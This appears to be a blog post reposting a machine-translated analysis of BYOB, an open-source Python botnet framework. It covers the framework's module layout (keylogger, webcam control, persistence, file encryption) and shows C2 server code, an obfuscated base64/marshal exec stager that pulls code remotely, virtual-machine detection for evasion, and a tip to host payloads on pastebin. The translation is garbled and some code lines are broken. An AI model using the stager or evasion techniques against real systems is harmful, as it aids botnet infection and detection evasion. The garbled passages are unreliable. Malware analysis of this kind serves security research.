Malwared | BYOB Write-Up Published on FreeBuf
post-template-default,single,single-post,postid-15843,single-format-standard,theme-bridge,woocommerce-no-js,ajax_fade,page_not_loaded,,columns-4,qode-child-theme-ver-1.0.0,qode-theme-ver-16.7,qode-theme-bridge,disabled_footer_bottom,wpb-js-composer js-comp-ver-5.5.2,vc_responsive

BYOB Write-Up Published on FreeBuf

BYOB Write-Up Published on FreeBuf

A pretty decent write-up of my BYOB (Build Your Own Botnet) project was recently published on the Chinese cybersecurity blog FreeBuf.
English translation:
BYOB is an open source botnet framework with 3k star on Github. I recently took the time to read the code and analyze it. Botnet refers to the attacker writing a program that automatically uses the vulnerability control computer in the cyberspace and uses the computer as a node to continue to spread. The author can issue commands through the server to control nodes and perform operations such as DOS attacks. . I have also participated in the event once treated botnets campus network penetration testing.
0x01 Introduction
Emergency Response – Botnet Mining Some botnets currently appear to exploit known nday vulnerabilities. I think the horrible thing about botnets is not the complexity of exploiting them, but rather the automation of intranet applications through network boundaries. Attacks, while automation determines the difficulty of exploiting the vulnerability. Vulnerabilities exploited by common botnets include: weak passwords, unauthorized, middleware RCE, general framework RCE, and so on.
Byob is a botnet framework written in Python. To be honest, I think Python is not suitable as a writing tool for botnet programs for several reasons:
1. Python has strong dependence on various libraries
2. Python needs different versions and platforms to handle compatibility
3. implement some of the features of other languages ​​may be relatively simple, but may be hidden bad
For the first problem, the byob framework uses a remote loading module to solve the problem, but as a non-scripting language, this framework is a very good research object, whether it is coding style or some details are worthwhile. I am going to analyze a wave of learning.
0x02 Structural Features
├── byob
│ ├── script generated by running on the controlled node
│ ├──
│ ├── core core framework code directory
│ │ ├── database operation related
│ │ ├──
│ │ ├── http protocol processing
│ │ ├──
│ │ ├── remote loader
│ │ ├── accept control module
│ │ ├── encryption and decryption processing
│ │ ├──
│ │ ├── universal function
│ ├── data
│ ├── database.db
│ ├──
│ ├── modules use module directory
│ │ ├── privilege escalation, actually runas
│ │ ├── for MAC OS detection login icloud account
│ │ ├──
│ │ ├── keylogger
│ │ ├── collects outlook client data
│ │ ├── sniffing
│ │ ├── payloads
│ │ │ └──
│ │ ├── Some things to hide the back door, there are timing tasks, WMi and other operations
│ │ ├── Send SMS
│ │ ├── port scan, TCP+ping
│ │ ├── Get the process on the system
│ │ ├── Encrypted file, RSA symmetric encryption, no panic
│ │ ├── screenshot
│ │ ├──stagers
│ │ │ └──
│ │ ├──
│ │ └── target webcam control
│ ├── requirements.txt
│ ├── Server
│ └──
From the current function of this framework, it belongs to a relatively good C&C, but for the proliferation of automated exploits of botnets, there are no such modules, as a framework, providing a large foundation. In addition, the framework also includes some features in the Windows environment, including WMI, etc., there are still many places worth learning.
0x03 Server side
The server side listens for a total of three ports, two Webservers and one C&C control port. Webserver is used to remotely load python modules. Webroot is located in the modules directory of the system module directory site-packages and byob.

globals()[‘debug’] = options.debug
globals()[‘package_handler’] = subprocess.Popen(‘{} -m SimpleHTTPServer {}’.format(sys.executable, options.port + 2), 0, None, subprocess.PIPE, subprocess.PIPE, subprocess. PIPE, cwd=globals()[‘packages’], shell=True)
globals()[‘module_handler’] = subprocess.Popen(‘{} -m SimpleHTTPServer {}’.format(sys.executable, options.port + 1), 0, None, subprocess.PIPE, subprocess.PIPE, subprocess. PIPE, cwd=modules, shell=True)
globals()[‘post_handler’] = subprocess.Popen(‘{} core/ {}’.format(sys.executable, options.port + 3), 0, None, subprocess.PIPE, subprocess.PIPE, subprocess.PIPE, shell=True)
globals()[‘c2’] = C2(, port=options.port, db=options.database)

Others are nothing special, mainly to see how he manages the Session, and how some control nodes are implemented. Do not elaborate.
0x04 Client code generation is a script that generates a sentence back code. Generated code:

import zlib, base64, marshal, urllib, json; exec (eval (marshal.loads (zlib.decompress (base64.b64decode ( ‘eJwrdmZgYCgtysnJTNIDUvkFqXka6hklJQVW + vqGhpZ6RpZ65qZ6RgaGVoYGQKCvX1ySmJ5aVKyflJukV1CprqlXlJqYoqEJAAL6FQ4 =’)))))


It can be seen that it is still dependent on remote download execution, the complete function code will be generated in modules/payloads/, this code is loaded by modules/stagers/ The code in modules/payloads/ is composed of under byob/core. The code used to interact with the Server is primarily located in
A new Python module loader is defined in for loading remote modules.
0x05 tips
5.1 Managed payload
Use pastebin to host the payload to increase anonymity. Of course there are other things, such as Dropbox.
5.2 Scalability
Since Byob was originally designed as a botnet framework, its scalability is very good, so it is convenient to add some functional modules to the botnet later. Byob is implemented by remote loading, and how can other non-scripting languages ​​be implemented. It is also worth learning to expand without completely replacing the original operating state.
5.3 Virtual Machine Detection

def environment ():

Environment = [key for key in os.environ if ‘VBOX’ in key]

Processes = [line.split()[0 if == ‘nt’ else -1] for line in os.popen(‘tasklist’ if == ‘nt’ else ‘ps’).read( ).splitlines()[3:] if line.split()[0 if == ‘nt’ else -1].lower().split(‘.’)[0] in [‘xenservice’, ‘vboxservice’, ‘vboxtray’, ‘vmusrvc’, ‘vmsrvc’, ‘vmwareuser’, ‘vmwaretray’, ‘vmtoolsd’, ‘vmcompute’, ‘vmmem’]]

Return bool(environment + processes)

It is also relatively simple, through the detection of environmental variables, to avoid falling into the honey pot or something.
5.4 Local Packet Capture

Sniffer_socket = socket.socket(socket.PF_PACKET, socket.SOCK_RAW, socket.htons(0x0003))

Capture the package in python version